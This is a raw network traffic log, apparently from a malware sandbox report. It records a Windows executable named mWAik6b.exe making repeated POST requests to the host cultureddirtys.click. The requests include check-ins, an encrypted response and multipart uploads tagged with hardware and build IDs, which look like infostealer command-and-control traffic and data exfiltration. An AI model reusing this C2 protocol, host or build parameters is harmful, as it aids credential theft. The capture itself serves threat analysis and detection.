2025-01-14 15:15:10 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: cultureddirtys.click
2025-01-14 15:15:10 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-14 15:15:10 UTC	1130	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 15:15:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ernq9mjqvc5nahb4u3does2hnc; expires=Sat, 10 May 2025 09:01:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YKy4dhZe95CmA45mC3xJxlQX93iB5f%2ByDhhZlML2oOllUyaU3PELUjpNn6WRBUs3bVpGN01FEdJQRGioZ6pEwxcG%2BBv53KRQcIjK8KKT2yJeseO56UX2XF9yhbHhySeBPh98NKHuXw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901e947519795e72-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2396&min_rtt=2378&rtt_var=928&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2852&recv_bytes=911&delivery_rate=1155977&cwnd=32&unsent_bytes=0&cid=215fe3d109138efb&ts=563&x=0"
2025-01-14 15:15:10 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-14 15:15:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	172.67.150.129	443	940	C:\Users\user\Desktop\mWAik6b.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 15:15:11 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 54 Host: cultureddirtys.click
2025-01-14 15:15:11 UTC	54	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 7a 64 71 63 73 73 6d 64 70 76 6b 75 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--zdqcssmdpvku&j=
2025-01-14 15:15:11 UTC	1133	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 15:15:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m8inars0197p0nepnsum1ab737; expires=Sat, 10 May 2025 09:01:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0xmz9gvtHq8sPZgpjSaMOLZLzywLWbNr2GIJCDkIwQXUHmiswnO3kY4VAaG798uHPwtPmUbRsPMOOHO43%2BPoEILR00%2BeoPjVF%2BJkjS7Jv2rwZYU7eT9fSOqypFr4I8js7QbHOECCeQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901e947aed994314-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1588&rtt_var=619&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2854&recv_bytes=958&delivery_rate=1733966&cwnd=188&unsent_bytes=0&cid=ce9d21a401546a49&ts=484&x=0"
2025-01-14 15:15:11 UTC	236	IN	Data Raw: 34 37 32 0d 0a 4b 44 42 43 52 37 59 58 6d 71 33 54 4c 56 76 6b 4a 61 6d 78 51 7a 4a 67 37 6c 67 65 70 34 78 7a 47 68 64 58 49 39 79 35 47 6b 4e 54 45 6a 52 6c 6a 43 4f 32 6a 36 42 49 65 64 35 52 32 38 51 6d 48 6b 4b 50 50 44 79 64 36 68 4a 32 5a 44 49 50 2f 73 39 33 59 52 4a 57 49 79 76 46 63 72 61 50 74 6c 56 35 33 6e 37 53 6b 79 5a 63 51 74 52 36 65 38 33 75 45 6e 5a 31 4e 6b 69 7a 79 58 59 67 51 46 77 6c 4c 39 4e 30 2f 73 79 2f 51 44 36 42 51 4d 6a 62 4c 56 73 4e 68 6a 55 38 69 36 34 57 59 44 56 74 41 5a 48 63 62 69 4a 6c 55 54 45 73 6c 47 71 32 31 76 46 49 4e 63 59 66 69 39 41 6d 55 41 79 49 50 48 58 50 35 42 74 2b 64 44 4e 4a 72 4e 42 38 4b 30 42 53 4a 69 37 5a 66 65 72 42 74 55 63 31 68 30 72 Data Ascii: 472KDBCR7YXmq3TLVvkJamxQzJg7lgep4xzGhdXI9y5GkNTEjRljCO2j6BIed5R28QmHkKPPDyd6hJ2ZDIP/s93YRJWIyvFcraPtlV53n7SkyZcQtR6e83uEnZ1NkizyXYgQFwlL9N0/sy/QD6BQMjbLVsNhjU8i64WYDVtAZHcbiJlUTEslGq21vFINcYfi9AmUAyIPHXP5Bt+dDNJrNB8K0BSJi7ZferBtUc1h0r
2025-01-14 15:15:11 UTC	909	IN	Data Raw: 49 6b 32 38 51 42 5a 52 36 4a 49 57 39 49 33 74 6b 4a 46 53 7a 79 33 35 68 56 52 77 35 5a 64 4e 35 75 4a 66 78 52 7a 57 49 51 73 6a 63 4a 6c 45 43 6e 6a 56 38 78 75 59 5a 66 48 38 36 54 72 48 56 63 69 5a 43 57 79 63 71 30 33 33 2b 77 4c 49 50 64 38 5a 41 30 35 4e 35 45 43 4b 63 4f 58 2f 52 34 77 41 34 61 6e 74 59 2f 74 78 30 59 52 49 53 4a 69 76 56 65 50 6a 64 75 55 51 79 67 31 58 41 32 69 78 64 41 6f 45 77 63 38 62 75 46 6e 4a 2f 4f 6b 75 36 31 6e 55 6e 53 6c 4a 67 61 35 52 79 34 49 2f 70 44 78 71 44 56 38 7a 66 4e 78 49 34 7a 43 55 79 33 4b 34 57 64 44 56 74 41 62 62 65 65 79 4a 42 58 53 4d 74 33 32 66 34 33 62 64 43 50 4a 52 42 7a 74 30 72 55 78 43 47 4e 48 72 47 35 78 70 78 63 44 4a 46 2f 70 55 34 4a 6c 49 53 65 47 58 31 65 50 50 44 75 31 67 35 78 6c Data Ascii: Ik28QBZR6JIW9I3tkJFSzy35hVRw5ZdN5uJfxRzWIQsjcJlECnjV8xuYZfH86TrHVciZCWycq033+wLIPd8ZA05N5ECKcOX/R4wA4antY/tx0YRISJivVePjduUQyg1XA2ixdAoEwc8buFnJ/Oku61nUnSlJga5Ry4I/pDxqDV8zfNxI4zCUy3K4WdDVtAbbeeyJBXSMt32f43bdCPJRBzt0rUxCGNHrG5xpxcDJF/pU4JlISeGX1ePPDu1g5xl
2025-01-14 15:15:11 UTC	1369	IN	Data Raw: 34 35 32 32 0d 0a 71 67 43 44 68 79 4f 51 48 6d 6d 33 63 75 52 56 6f 67 4a 4e 42 34 2f 4d 36 38 51 7a 43 46 53 38 66 62 4c 46 77 47 67 7a 4a 30 78 75 59 44 64 6e 73 7a 52 37 37 65 4f 47 38 4b 56 54 68 6c 6a 44 58 63 77 61 5a 62 4d 73 52 79 79 4e 30 76 56 78 54 4d 4a 54 4c 63 72 68 5a 30 4e 57 30 42 73 4e 5a 7a 4c 55 31 62 49 53 62 55 66 2f 62 41 75 30 63 78 68 6b 72 4b 32 43 6c 57 44 34 63 31 63 38 4c 6d 45 6e 52 77 4f 45 4c 2b 6c 54 67 6d 55 68 4a 34 5a 66 46 37 2b 39 36 67 44 51 79 46 53 63 58 55 4e 78 41 64 77 69 4d 38 77 75 4a 52 49 44 55 2f 52 72 6e 66 64 53 74 4a 56 69 51 6f 32 33 7a 78 78 71 4e 46 4e 59 68 56 78 74 6b 6b 58 67 36 4a 4e 58 7a 45 37 78 39 79 66 6e 55 50 2f 74 78 67 59 52 49 53 44 79 6a 45 5a 2f 4c 45 6f 41 30 4d 68 55 6e 46 31 44 63 Data Ascii: 4522qgCDhyOQHmm3cuRVogJNB4/M68QzCFS8fbLFwGgzJ0xuYDdnszR77eOG8KVThljDXcwaZbMsRyyN0vVxTMJTLcrhZ0NW0BsNZzLU1bISbUf/bAu0cxhkrK2ClWD4c1c8LmEnRwOEL+lTgmUhJ4ZfF7+96gDQyFScXUNxAdwiM8wuJRIDU/RrnfdStJViQo23zxxqNFNYhVxtkkXg6JNXzE7x9yfnUP/txgYRISDyjEZ/LEoA0MhUnF1Dc
2025-01-14 15:15:11 UTC	1369	IN	Data Raw: 48 61 46 38 56 39 68 4e 54 4a 4e 2f 6f 4d 34 4b 30 5a 57 49 79 6e 64 65 66 58 4f 74 55 67 30 67 6b 66 4e 31 53 52 52 43 59 51 32 63 38 2f 69 46 58 52 38 4d 30 32 39 32 48 35 68 42 42 49 6e 50 5a 51 74 75 4f 36 38 52 44 57 47 52 4e 72 55 59 52 35 43 67 6a 78 38 68 62 59 48 61 47 49 79 58 76 44 43 4f 43 5a 47 45 6e 68 6c 33 6d 66 39 77 62 56 46 50 49 4a 4c 77 64 4d 6b 51 67 71 4b 50 58 44 4e 36 78 35 2b 63 44 68 47 74 64 68 71 4d 30 6c 57 4c 69 6d 55 4f 37 6a 49 71 51 39 68 78 6d 4c 63 30 44 46 57 41 63 77 6c 4d 74 79 75 46 6e 51 31 62 51 47 2b 31 58 51 71 54 56 6b 72 49 64 42 31 39 63 53 2f 51 54 43 4b 54 38 66 55 4d 31 30 48 68 44 42 31 77 4f 49 63 65 32 63 32 51 50 36 56 4f 43 5a 53 45 6e 68 6c 38 30 62 50 37 50 46 51 64 35 38 48 7a 4e 39 68 43 45 4b 4e Data Ascii: HaF8V9hNTJN/oM4K0ZWIyndefXOtUg0gkfN1SRRCYQ2c8/iFXR8M0292H5hBBInPZQtuO68RDWGRNrUYR5Cgjx8hbYHaGIyXvDCOCZGEnhl3mf9wbVFPIJLwdMkQgqKPXDN6x5+cDhGtdhqM0lWLimUO7jIqQ9hxmLc0DFWAcwlMtyuFnQ1bQG+1XQqTVkrIdB19cS/QTCKT8fUM10HhDB1wOIce2c2QP6VOCZSEnhl80bP7PFQd58HzN9hCEKN
2025-01-14 15:15:11 UTC	1369	IN	Data Raw: 34 4f 4e 6d 78 31 52 72 4b 62 49 47 46 4e 57 69 67 72 31 33 50 7a 77 37 31 4f 4d 49 42 43 77 39 51 75 56 77 75 4c 4f 6e 72 58 36 52 78 78 64 54 35 49 74 4e 39 35 4b 67 6f 63 59 43 4c 4d 4e 61 43 50 67 30 67 76 6c 6b 53 4c 7a 47 39 4a 51 6f 73 32 50 4a 32 75 48 47 70 30 4d 46 4f 36 31 48 4d 7a 51 56 51 67 49 4d 5a 79 39 4d 57 2b 54 44 47 4c 52 4d 50 42 49 56 30 43 6e 69 68 36 7a 75 42 52 4e 6a 55 79 57 66 36 44 4f 42 42 64 57 57 41 36 6d 6d 79 34 79 4c 30 50 59 63 5a 45 77 64 34 76 51 67 61 4b 4d 58 2f 4c 35 68 52 77 63 54 39 4d 73 64 42 79 4b 45 4a 53 4c 79 44 63 66 76 37 42 73 45 6b 31 69 77 65 46 6b 79 5a 49 51 74 52 36 57 39 2f 6a 46 32 39 6b 41 45 61 2b 69 6a 67 2b 42 45 74 67 49 74 67 31 6f 49 2b 38 51 7a 4f 4c 51 73 2f 62 4a 6c 4d 44 67 44 35 78 79 Data Ascii: 4ONmx1RrKbIGFNWigr13Pzw71OMIBCw9QuVwuLOnrX6RxxdT5ItN95KgocYCLMNaCPg0gvlkSLzG9JQos2PJ2uHGp0MFO61HMzQVQgIMZy9MW+TDGLRMPBIV0Cnih6zuBRNjUyWf6DOBBdWWA6mmy4yL0PYcZEwd4vQgaKMX/L5hRwcT9MsdByKEJSLyDcfv7BsEk1iweFkyZIQtR6W9/jF29kAEa+ijg+BEtgItg1oI+8QzOLQs/bJlMDgD5xy
2025-01-14 15:15:11 UTC	1369	IN	Data Raw: 31 4f 30 79 34 32 6e 6b 70 51 6c 49 6d 4c 39 42 32 38 63 79 32 52 6a 2b 4e 52 4d 48 63 4a 6c 59 47 6a 44 46 37 79 2b 67 55 63 33 78 31 44 2f 37 63 59 47 45 53 45 67 59 47 78 6d 66 4b 77 62 4a 55 65 5a 6b 4a 30 70 4d 6d 58 45 4c 55 65 6e 66 4e 34 51 4e 39 66 44 31 46 74 39 74 38 4b 30 64 56 49 43 44 5a 63 50 7a 42 74 55 67 35 69 6b 6a 4d 32 79 35 55 41 6f 4e 36 4d 6f 58 70 43 54 67 74 64 57 47 31 7a 56 6b 76 51 55 42 67 4f 70 70 73 75 4d 69 39 44 32 48 47 53 63 4c 53 4b 56 34 4f 68 44 35 75 78 65 55 59 64 33 51 36 51 62 33 61 63 69 6c 59 56 43 41 75 33 48 4c 77 79 37 39 64 4f 49 6b 48 68 5a 4d 6d 53 45 4c 55 65 6b 33 54 36 52 5a 33 4e 78 78 47 70 64 70 79 49 6b 46 65 59 44 71 61 62 4c 6a 49 76 51 39 68 78 6b 72 48 33 69 56 43 44 6f 77 36 64 63 4c 6b 41 33 Data Ascii: 1O0y42nkpQlImL9B28cy2Rj+NRMHcJlYGjDF7y+gUc3x1D/7cYGESEgYGxmfKwbJUeZkJ0pMmXELUenfN4QN9fD1Ft9t8K0dVICDZcPzBtUg5ikjM2y5UAoN6MoXpCTgtdWG1zVkvQUBgOppsuMi9D2HGScLSKV4OhD5uxeUYd3Q6Qb3acilYVCAu3HLwy79dOIkHhZMmSELUek3T6RZ3NxxGpdpyIkFeYDqabLjIvQ9hxkrH3iVCDow6dcLkA3
2025-01-14 15:15:11 UTC	1369	IN	Data Raw: 73 74 46 2f 4c 31 68 54 4b 69 6e 56 63 76 2f 45 6f 30 51 72 6a 55 2f 49 33 53 6c 5a 41 6f 49 36 66 63 6a 75 55 54 59 31 4d 6c 6e 2b 67 7a 67 45 61 55 55 32 4c 35 5a 57 37 39 6d 37 53 44 57 51 54 4d 72 51 4e 31 30 53 7a 48 51 38 31 4f 6b 41 4f 43 30 6a 55 61 6e 63 5a 32 39 54 45 69 63 70 6c 43 32 34 78 4c 35 42 4e 49 31 44 77 74 59 70 55 77 65 4a 4d 48 44 4a 37 78 6c 78 66 7a 42 45 75 4e 46 37 4c 30 56 54 4c 43 48 64 65 2f 47 50 2f 77 38 2b 6e 67 65 54 6b 78 64 41 42 5a 51 33 62 49 66 63 45 6d 6c 6b 49 45 79 75 33 54 6f 4f 53 56 34 6a 49 4e 4e 6c 75 4e 44 2f 56 6e 6d 42 53 34 75 4c 59 56 41 47 67 44 6c 37 79 2b 45 63 64 33 49 2b 54 72 54 56 61 69 35 50 57 69 77 74 32 57 66 79 78 61 4e 47 4d 49 74 4a 77 38 45 69 45 45 7a 4d 50 57 53 46 74 6c 46 4b 66 7a 5a Data Ascii: stF/L1hTKinVcv/Eo0QrjU/I3SlZAoI6fcjuUTY1Mln+gzgEaUU2L5ZW79m7SDWQTMrQN10SzHQ81OkAOC0jUancZ29TEicplC24xL5BNI1DwtYpUweJMHDJ7xlxfzBEuNF7L0VTLCHde/GP/w8+ngeTkxdABZQ3bIfcEmlkIEyu3ToOSV4jINNluND/VnmBS4uLYVAGgDl7y+Ecd3I+TrTVai5PWiwt2WfyxaNGMItJw8EiEEzMPWSFtlFKfzZ
2025-01-14 15:15:11 UTC	1369	IN	Data Raw: 44 6b 4b 43 6d 41 51 31 33 76 32 79 4b 64 65 64 4b 64 4b 77 4e 38 73 58 77 6e 4d 64 44 7a 44 72 6b 6b 6f 4f 33 56 46 72 35 73 67 63 52 67 4a 64 58 61 44 4a 61 72 51 2f 31 5a 35 6b 41 65 54 67 57 38 51 45 4d 78 69 50 49 4c 74 41 32 70 7a 4e 6c 65 39 6e 45 59 66 61 55 55 32 4c 38 38 33 33 73 69 67 52 69 2b 4c 56 66 58 74 44 31 30 44 6a 7a 51 2b 39 50 67 63 61 48 59 77 52 6f 44 6c 64 69 5a 65 56 53 34 6a 31 44 57 32 6a 37 34 50 59 62 38 48 67 35 4d 65 48 6b 4b 55 65 69 53 46 32 78 4a 32 65 7a 4a 58 72 35 5a 62 4e 6c 78 59 4f 32 66 79 63 75 6e 47 70 30 49 72 78 67 6d 4c 31 57 45 49 55 73 4a 36 65 4e 53 75 53 53 67 6e 62 68 54 74 6a 43 68 7a 56 52 77 35 5a 63 49 31 6f 4a 33 2f 44 79 76 47 48 34 75 55 49 6b 49 51 69 6a 6c 71 78 71 6b 76 52 6c 55 2b 56 37 2f 57 Data Ascii: DkKCmAQ13v2yKdedKdKwN8sXwnMdDzDrkkoO3VFr5sgcRgJdXaDJarQ/1Z5kAeTgW8QEMxiPILtA2pzNle9nEYfaUU2L8833sigRi+LVfXtD10DjzQ+9PgcaHYwRoDldiZeVS4j1DW2j74PYb8Hg5MeHkKUeiSF2xJ2ezJXr5ZbNlxYO2fycunGp0IrxgmL1WEIUsJ6eNSuSSgnbhTtjChzVRw5ZcI1oJ3/DyvGH4uUIkIQijlqxqkvRlU+V7/W
2025-01-14 15:15:11 UTC	1369	IN	Data Raw: 64 7a 63 6f 51 6e 35 34 47 6f 44 79 2f 47 48 35 6d 64 59 55 4a 43 31 48 6f 37 78 76 77 44 66 6e 59 6a 51 76 6e 6c 52 68 52 4a 58 43 34 69 77 6b 44 37 33 72 4a 50 4d 72 68 35 36 74 30 71 56 77 36 61 42 45 4c 77 37 52 39 32 63 69 4e 51 2f 70 55 34 4c 67 6f 4b 47 57 57 63 4e 63 65 42 38 56 64 35 33 67 66 2b 30 43 39 65 42 5a 6f 72 4d 66 44 74 41 48 74 31 50 67 48 77 6d 33 35 68 45 67 42 75 5a 64 42 6b 75 4a 66 68 48 57 4c 54 46 4a 79 44 63 30 39 4d 6c 58 70 71 68 62 5a 44 4e 6a 55 6e 41 65 61 62 50 79 4a 59 51 43 59 6d 77 6e 61 2f 38 59 39 70 4f 6f 46 42 79 4e 30 32 51 55 43 6a 4f 58 66 4a 34 68 5a 75 53 77 74 55 76 64 56 32 4a 6c 78 44 59 47 75 55 65 72 69 58 69 41 38 6f 6a 45 43 48 6d 32 31 42 45 59 49 78 61 73 4b 75 4c 6a 59 31 4c 51 48 6d 6d 30 30 69 52 Data Ascii: dzcoQn54GoDy/GH5mdYUJC1Ho7xvwDfnYjQvnlRhRJXC4iwkD73rJPMrh56t0qVw6aBELw7R92ciNQ/pU4LgoKGWWcNceB8Vd53gf+0C9eBZorMfDtAHt1PgHwm35hEgBuZdBkuJfhHWLTFJyDc09MlXpqhbZDNjUnAeabPyJYQCYmwna/8Y9pOoFByN02QUCjOXfJ4hZuSwtUvdV2JlxDYGuUeriXiA8ojECHm21BEYIxasKuLjY1LQHmm00iR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49708	172.67.150.129	443	940	C:\Users\user\Desktop\mWAik6b.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 15:15:12 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=YM6I1A3CSQRET User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12812 Host: cultureddirtys.click
2025-01-14 15:15:12 UTC	12812	OUT	Data Raw: 2d 2d 59 4d 36 49 31 41 33 43 53 51 52 45 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 36 39 43 32 36 46 45 33 30 36 44 34 32 44 42 43 33 46 32 38 44 31 32 46 36 31 45 34 38 42 0d 0a 2d 2d 59 4d 36 49 31 41 33 43 53 51 52 45 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 4d 36 49 31 41 33 43 53 51 52 45 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 7a 64 71 63 73 73 6d 64 70 76 6b 75 0d 0a 2d 2d 59 4d 36 49 Data Ascii: --YM6I1A3CSQRETContent-Disposition: form-data; name="hwid"2D69C26FE306D42DBC3F28D12F61E48B--YM6I1A3CSQRETContent-Disposition: form-data; name="pid"2--YM6I1A3CSQRETContent-Disposition: form-data; name="lid"LPnhqo--zdqcssmdpvku--YM6I
2025-01-14 15:15:13 UTC	1134	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 15:15:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1tf31je1863eb36r9f7f3orb7q; expires=Sat, 10 May 2025 09:01:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uExcjJYf8zActJ3KSy%2BS1eFlsjgGtk4nXJ4hx3R564NNiCToV9ZiJgULe9PB66k1FZ8AfhefS1VWIlspQInq2dCsVnHKY5B4zaUOzx0VY2eNqPgSSsxKt26ZRqnMF9fej%2F5glF1qmA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901e94830ecc5e74-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1651&rtt_var=626&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2853&recv_bytes=13751&delivery_rate=1768625&cwnd=112&unsent_bytes=0&cid=4988f5b4dbb00824&ts=921&x=0"
2025-01-14 15:15:13 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-14 15:15:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49713	172.67.150.129	443	940	C:\Users\user\Desktop\mWAik6b.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 15:15:13 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=GBQG17QEBFSF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15048 Host: cultureddirtys.click
2025-01-14 15:15:13 UTC	15048	OUT	Data Raw: 2d 2d 47 42 51 47 31 37 51 45 42 46 53 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 36 39 43 32 36 46 45 33 30 36 44 34 32 44 42 43 33 46 32 38 44 31 32 46 36 31 45 34 38 42 0d 0a 2d 2d 47 42 51 47 31 37 51 45 42 46 53 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 42 51 47 31 37 51 45 42 46 53 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 7a 64 71 63 73 73 6d 64 70 76 6b 75 0d 0a 2d 2d 47 42 51 47 31 37 51 Data Ascii: --GBQG17QEBFSFContent-Disposition: form-data; name="hwid"2D69C26FE306D42DBC3F28D12F61E48B--GBQG17QEBFSFContent-Disposition: form-data; name="pid"2--GBQG17QEBFSFContent-Disposition: form-data; name="lid"LPnhqo--zdqcssmdpvku--GBQG17Q
2025-01-14 15:15:14 UTC	1130	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 15:15:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bk2jbh0ltdt1ck8i71duoqi62f; expires=Sat, 10 May 2025 09:01:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eNr5hMgrAoOnREsV5UgVHiIMZt3bPFJCbApH6Hlj6oKvtKvLuVIXWrLxFKk17vuuQtiwsCE2UABrjTroXWAUbZKrK57ub7BObSIiqfYX7w8kLhy7NMSzAfpqFkOzBdXkLu7J9wErqg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901e948bee6305a2-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7841&min_rtt=7834&rtt_var=2951&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2854&recv_bytes=15986&delivery_rate=370088&cwnd=32&unsent_bytes=0&cid=a0451137db16dae6&ts=621&x=0"
2025-01-14 15:15:14 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-14 15:15:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49715	172.67.150.129	443	940	C:\Users\user\Desktop\mWAik6b.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 15:15:15 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=LIGXB76K4YW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20532 Host: cultureddirtys.click
2025-01-14 15:15:15 UTC	15331	OUT	Data Raw: 2d 2d 4c 49 47 58 42 37 36 4b 34 59 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 36 39 43 32 36 46 45 33 30 36 44 34 32 44 42 43 33 46 32 38 44 31 32 46 36 31 45 34 38 42 0d 0a 2d 2d 4c 49 47 58 42 37 36 4b 34 59 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 49 47 58 42 37 36 4b 34 59 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 7a 64 71 63 73 73 6d 64 70 76 6b 75 0d 0a 2d 2d 4c 49 47 58 42 37 36 4b 34 59 Data Ascii: --LIGXB76K4YWContent-Disposition: form-data; name="hwid"2D69C26FE306D42DBC3F28D12F61E48B--LIGXB76K4YWContent-Disposition: form-data; name="pid"3--LIGXB76K4YWContent-Disposition: form-data; name="lid"LPnhqo--zdqcssmdpvku--LIGXB76K4Y
